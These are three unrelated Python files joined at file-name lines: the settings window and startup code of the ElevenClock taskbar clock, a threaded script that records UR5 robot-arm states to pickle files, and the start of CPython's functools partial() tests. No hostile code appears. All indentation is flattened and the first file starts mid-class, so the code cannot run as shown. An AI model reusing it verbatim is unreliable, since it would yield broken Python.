self.hiddenButton = QSettingsButton(f"ElevenClock Version: {version} {platform.architecture()[0]}\nSystem version: {platform.system()} {platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=130)
self.hiddenButton.button.setVisible(False)
layout.addWidget(self.hiddenButton)
layout.addSpacing(15)
self.resizewidget.setLayout(layout)
self.setWidget(self.resizewidget)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setWindowTitle(_("ElevenClock Settings"))
self.applyStyleSheet()
self.setMinimumWidth(400)
def applyStyleSheet(self):
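# The Windows accent palette is read below as a raw registry blob of eight
# colors stored as R,G,B bytes each followed by a 0x00 byte, so splitting on
# b"\x00" normally yields 3-byte chunks; chunks of any other length (possible
# when a channel value is itself zero) are skipped, keeping the hard-coded
# fallback color for that slot.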
colors = ['215,226,228', '160,174,183', '101,116,134', '81,92,107', '69,78,94', '41,47,64', '15,18,36', '239,105,80']
string = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Accent", "AccentPalette", b'\xe9\xd8\xf1\x00\xcb\xb7\xde\x00\x96}\xbd\x00\x82g\xb0\x00gN\x97\x00H4s\x00#\x13K\x00\x88\x17\x98\x00')
i = 0
for color in string.split(b"\x00"):
try:
if(len(color)==3):
colors[i] = f"{color[0]},{color[1]},{color[2]}"
else:
print("NullColor")
except IndexError:
pass
finally:
i += 1
print(colors)
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.PichonButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.closeButton.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.startupButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.RegionButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.WebPageButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.logButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.CofeeButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.openTranslateButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.setStyleSheet(f"""
QMenu {{
border: {self.getPx(1)}px solid rgb(60, 60, 60);
padding: {self.getPx(2)}px;
outline: 0px;
color: white;
background: #262626;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(60, 60, 60);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(255, 255, 255, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#background,QScrollArea,QMessageBox{{
color: white;
background-color: #212121;
}}
* {{
color: #dddddd;
font-size: 8pt;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #212121;
selection-background-color: rgb({colors[4]});
border: none;
}}
QPushButton {{
width: 100px;
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
QPushButton:hover {{
background-color: #393939;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #414141;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #454545;
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[2]});
border-top-color: rgb({colors[1]});
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[1]});
border-top-color: rgb({colors[1]});
}}
#title{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: #303030;
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: #252525;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #2a2a2a;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[1]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[2]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: 100px;
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
#stCmbbx:hover {{
background-color: #393939;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #414141;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #454545;
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid #1c1c1c;
padding: {self.getPx(4)}px;
outline: 0px;
padding-right: {self.getPx(0)}px;
background-color: #303030;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background-color: #4c4c4c;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QScrollArea, QVBoxLayout{{
border: none;
margin: 0px;
padding: 0px;
outline: none;
}}
QScrollBar:vertical {{
background: #303030;
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #505050;
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #808080;
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
""")
else:
self.iconMode = "black"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.PichonButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.CofeeButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.startupButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.RegionButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.WebPageButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.logButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.closeButton.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.openTranslateButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.setStyleSheet(f"""
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #ffffff;
selection-background-color: rgb({colors[3]});
border: none;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(200, 200, 200);
padding: {self.getPx(2)}px;
outline: 0px;
color: black;
background: #eeeeee;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(200, 200, 200);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(0, 0, 0, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#background {{
color: white;
}}
* {{
background-color: #eeeeee;
color: #000000;
font-size: 8pt;
}}
QPushButton {{
width: 100px;
background-color: #ffffff;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
QPushButton:hover {{
background-color: #f6f6f6;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[4]});
border-bottom-color: rgb({colors[5]});
color: white;
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[3]});
color: white;
border-bottom-color: rgb({colors[3]});
}}
#title{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 1px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: #ffffff;
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
border-bottom: 1px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: #ffffff;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #eeeeee;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(0)}px solid #bbbbbb;
background-color: rgb({colors[4]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(0)}px solid #bbbbbb;
background-color: rgb({colors[3]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stCmbbx {{
width: 100px;
background-color: #ffffff;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#stCmbbx:hover {{
background-color: #f6f6f6;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid #dddddd;
padding: {self.getPx(4)}px;
outline: 0px;
background-color: #ffffff;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background-color: #eeeeee;
height: {self.getPx(30)}px;
outline: none;
color: black;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QScrollArea, QVBoxLayout{{
border: none;
margin: 0px;
padding: 0px;
outline: none;
}}
QScrollBar:vertical {{
background: #ffffff;
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #dddddd;
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #bbbbbb;
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
""")
def showDebugInfo(self):
global old_stdout, buffer
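# Assumes stdout was redirected into the global `buffer` (an io.StringIO) at
# startup: restore the real stdout, show everything captured so far, then swap
# in a fresh buffer so capturing continues after the viewer is opened.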
win = QMainWindow(self)
win.resize(800, 600)
win.setWindowTitle("ElevenClock's log")
textEdit = QPlainTextEdit()
textEdit.setReadOnly(True)
sys.stdout = old_stdout # Put the old stream back in place
textEdit.setPlainText(buffer.getvalue())
old_stdout = sys.stdout # Memorize the default stdout stream
sys.stdout = buffer = io.StringIO()
win.setCentralWidget(textEdit)
win.show()
def moveEvent(self, event: QMoveEvent) -> None:
if(self.updateSize):
self.resizewidget.resize(self.width()-self.getPx(17), self.resizewidget.height())
self.resizewidget.setMinimumHeight(self.resizewidget.sizeHint().height())
else:
def enableUpdateSize(self: SettingsWindow):
time.sleep(1)
self.updateSize = True
self.updateSize = False
KillableThread(target=enableUpdateSize, args=(self,)).start()
def resizeEvent(self, event: QResizeEvent) -> None:
self.resizewidget.resize(self.width()-self.getPx(17), self.resizewidget.height())
self.resizewidget.setMinimumHeight(self.resizewidget.sizeHint().height())
def show(self) -> None:
self.applyStyleSheet()
self.raise_()
return super().show()
def showEvent(self, event: QShowEvent) -> None:
self.resizewidget.setMinimumHeight(self.resizewidget.sizeHint().height())
return super().showEvent(event)
def closeEvent(self, event: QCloseEvent) -> None:
self.hide()
event.ignore()
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
# Start of main script
try:
os.chdir(os.path.expanduser("~"))
os.chdir(".elevenclock")
except FileNotFoundError:
os.mkdir(".elevenclock")
os.chdir(".elevenclock")
if hasattr(sys, 'frozen'):
realpath = sys._MEIPASS
else:
realpath = '/'.join(sys.argv[0].replace("\\", "/").split("/")[:-1])
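# When running as a PyInstaller bundle, sys.frozen is set and bundled assets
# (icons, translations) are unpacked under sys._MEIPASS; otherwise resources
# are resolved relative to the script's own directory.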
languages = {
"ca": lang_ca,
"de": lang_de,
"el": lang_el,
"en": lang_en,
"es": lang_es,
"fr": lang_fr,
"it": lang_it,
"ko": lang_ko,
"nb": lang_nb,
"nl": lang_nl,
"pl": lang_pl,
"pt": lang_pt,
"ru": lang_ru,
"tr": lang_tr,
"vi": lang_vi,
"zh_TW": lang_zh_TW,
}
languageReference = {
"default": "System language",
"ca": "Catalan",
"nl": "Dutch",
"en": "English",
"fr": "French",
"de": "German",
"el": "Greek",
"it": "Italian",
"ko": "Korean",
"nb": "Norwegian",
"es": "Spanish",
"pl": "Polish",
"pt": "Portuguese",
"ru": "Russian",
"tr": "Turkish",
"vi": "Vietnamese",
"zh_TW": "Chinese Traditional (Taiwan)",
}
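# Resolution order used below: an unset preference is initialised to "default",
# "default" follows the OS locale (first two letters, with zh_TW special-cased),
# and any unknown code falls back to English.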
if getSettingsValue("PreferredLanguage") == "":
setSettingsValue("PreferredLanguage", "default", False)
if getSettingsValue("PreferredLanguage") == "default":
langName = "default"
try:
print(locale.getdefaultlocale()[0][0:2])
langName = locale.getdefaultlocale()[0][0:2]
if(langName != "zh"):
lang = languages[langName]
elif(locale.getdefaultlocale()[0].replace("\n", "").strip() == "zh_TW"):
langName = "zh_TW"
lang = languages["zh_TW"]
else:
raise KeyError(f"Value not found for {langName}")
except KeyError:
lang = lang_en
print("unknown language")
except Exception as e:
print(e)
lang = lang_en
else:
try:
print(getSettingsValue("PreferredLanguage")[0:2])
langName = getSettingsValue("PreferredLanguage")[0:2]
if(langName != "zh"):
lang = languages[langName]
elif(getSettingsValue("PreferredLanguage").replace("\n", "").strip() == "zh_TW"):
langName = "zh_TW"
lang = languages["zh_TW"]
else:
raise KeyError(f"Value not found for {langName}")
except KeyError:
lang = lang_en
langName = "en"
print("unknown language")
except Exception as e:
print(e)
lang = lang_en
langName = "en"
if lang is None:
lang = lang_en
tdir = tempfile.TemporaryDirectory()
tempDir = tdir.name
seconddoubleclick = False
isRDPRunning = False
showSeconds = 0
timeStr = ""
dateTimeFormat = ""
mController = MouseController()
clocks = []
oldScreens = []
QApplication.setAttribute(Qt.AA_DisableHighDpiScaling)
app = QApplication()
app.setQuitOnLastWindowClosed(False)
signal = RestartSignal()
showNotif = InfoSignal()
showWarn = InfoSignal()
killSignal = InfoSignal()
sw = SettingsWindow()
i = TaskbarIconTray(app)
showNotif.infoSignal.connect(lambda a, b: showMessage(a, b))
showWarn.infoSignal.connect(lambda a, b: wanrUserAboutUpdates(a, b))
killSignal.infoSignal.connect(lambda: app.quit())
KillableThread(target=updateChecker, daemon=True).start()
KillableThread(target=isElevenClockRunning, daemon=True).start()
KillableThread(target=checkIfWokeUp, daemon=True).start()
st: KillableThread = None # Will be defined on loadClocks
rdpThread = KillableThread(target=checkRDP, daemon=True)
timethread = KillableThread(target=timeStrThread, daemon=True)
timethread.start()
if(getSettings("EnableHideOnRDP")):
rdpThread.start()
signal.restartSignal.connect(lambda: restartClocks("checkLoop"))
loadClocks()
if not(getSettings("Updated2.5Already")) and not(getSettings("EnableSilentUpdates")):
print("Show2.5Welcome")
sw.show()
setSettings("Updated2.5Already", True)
QMessageBox.information(sw, "ElevenClock updated!", "ElevenClock has updated to version 2.5 successfully. On this release:\n\n - ElevenClock can hide when using Citrix Workspace\n - ElevenClock can be forced to show with black text\n - If silent updates are enabled, the user won't see this popup\n - ElevenClock has an in-app log viewer (can be opened from settings)\n - Hover effect improvements\n - Much more!")
showSettings = False
if("--settings" in sys.argv or showSettings):
sw.show()
if("--quit-on-loaded" in sys.argv):
sys.exit(0)
app.exec_()
sys.exit(0)
RecoderRobotData.py
# MIT License.
# Copyright (c) 2020 by BioicDL. All rights reserved.
# Created by LiuXb on 2020/11/24
# -*- coding:utf-8 -*-
"""
@Modified:
@Description:
"""
import threading
import time
import queue
from deepclaw.driver.arms import URController_rtde as URctl
from deepclaw.driver.arms.ArmController import ArmController
import pickle
# receive
class GetRobotData(object):
def __init__(self):
self.flag = True
def stop(self):
self.flag = False
# push data to buffer
def run(self, robot: ArmController, data_buffer: queue.Queue):
while self.flag:
status = robot.get_state()
time.sleep(0.01)
time_stamp = time.time()
status.update({'time': time_stamp})
data_buffer.put(status)
# print(data_buffer.get())
# write
class SaveRobotData(object):
def __init__(self):
self.flag = True
def stop(self):
self.flag = False
def run(self, data_buffer: queue.Queue, filename: str):
while self.flag:
time.sleep(0.01)
if data_buffer.empty():
continue
else:
dd = data_buffer.get()
with open(filename, "ab") as f:
pickle.dump(dd, f)
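# GetRobotData and SaveRobotData form a producer/consumer pair around the
# Queue: the reader polls the arm roughly every 10 ms and tags each state dict
# with a wall-clock 'time', while the writer drains the queue and appends each
# record via pickle.dump; the file can be replayed later by calling pickle.load
# in a loop until EOFError, as the __main__ block below does.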
class MoveRobot(object):
def __init__(self):
self.flag = True
self.action = None
self.joint = None
def stop(self):
self.flag = False
def set_joints(self, joint):
self.joint = joint
def run(self, robot: ArmController, data_buffer: queue.Queue = None):
# a Queue created in the signature would be shared across calls (mutable default); make one per call instead
if data_buffer is None:
data_buffer = queue.Queue(maxsize=5000)
# get data
gd = GetRobotData()
read_thread = threading.Thread(target=gd.run, args=(robot, data_buffer,), daemon=True)
read_thread.start()
srd = SaveRobotData()
write_thread = threading.Thread(target=srd.run, args=(data_buffer, 'test12.result'), daemon=True)
write_thread.start()
# robot move
# start_joints = [-1.57, -1.57, -1.57, -1.9, 1.57, -1.57]
# target_joints = [-1.57, -1.57, -0.9, -0.8, 1.57, -1.57]
# robot.move_j(start_joints, 3, 6)
# robot.move_j(target_joints, 3, 6)
# start_point = [-0.18246, -0.68835, 0.45416, 1.6984, -1.8888, 0.6290]
# end_point = [-0.0, -0.4, 0.3, 1.6984, -1.8888, 0.6290]
start_point = [-0.3892851151079589, -0.3682649768115375, 0.04614461354888244, 2.2542664595069044, -2.1577230405724532, 0.0400075423311235]
end_point = [0.15187793252132198, -0.3682209644731936, 0.04613768841089927, 2.254392008739246, -2.157709829869653, 0.03999406389204092]
end_point = [0.15187289148918068, -0.36824285448867394, 0.19094064392090843, 2.2543793879010128, -2.157687910000569, 0.040065884281925035]
start_point = [-0.11335, -0.30967, 0.12822 + 0.0, 2.2166, -2.2166, 0]
target_point = [-0.11497, -0.70276, 0.40416+0.05, 1.7987, -1.8151, 0.6662]
# robot.move_L(start_point)
# robot.move_L(target_point, 2, 8)
# robot.move_p(start_point)
# robot.move_p(target_point, 2, 8)
start_joint2 = [-1.63, -1.57, -1.57, -1.9, 1.57, -1.57]
target_joint2 = [-1.63, -1.833, -1.15, -0.8, 1.57, -1.57]
robot.move_j(start_joint2, 3, 15)
robot.move_j(target_joint2, 3, 15)
# robot.move_j(self.joint, 2.8, 2.2)
gd.stop()
srd.stop()
robot.move_L(start_point)
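# Note: stop() only clears the loop flags; both threads are daemons, so any
# records still queued at program exit may go unwritten, and the final move_L
# back to start_point happens after recording has stopped.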
if __name__ == '__main__':
rb = URctl.URController('../../configs/basic_config/robot_ur5.yaml')
print('Start move!')
joints_pos = [-1.41319307, -1.51162964, -1.66329875, -1.50447379, 1.53746051, 0.14490873]
db = queue.Queue(maxsize=0)
x = MoveRobot()
x.set_joints(joints_pos)
x.run(rb, db)
# state = robot.get_state()
# print(state)
# rb.go_home()
# home_joints = [-1.57, -1.57, -1.57, -1.9, 1.57, -1.57]
# # rb.move_j(home_joints, 2, 4)
# print('reach home pose')
# for i in range(10):
# status = robot.get_state()
# time_stamp = time.time()
# status.update({'time': time_stamp})
# print(status)
# time.sleep(0.5)
# with open("dict", "ab") as f:
# pickle.dump(status, f)
#
print('============================================')
with open("test8.txt", 'rb') as f:
while True:
try:
aa = pickle.load(f)
print(aa)
except EOFError:
break
test_functools.py
import abc
import collections
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import unittest
from weakref import proxy
try:
import threading
except ImportError:
threading = None
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
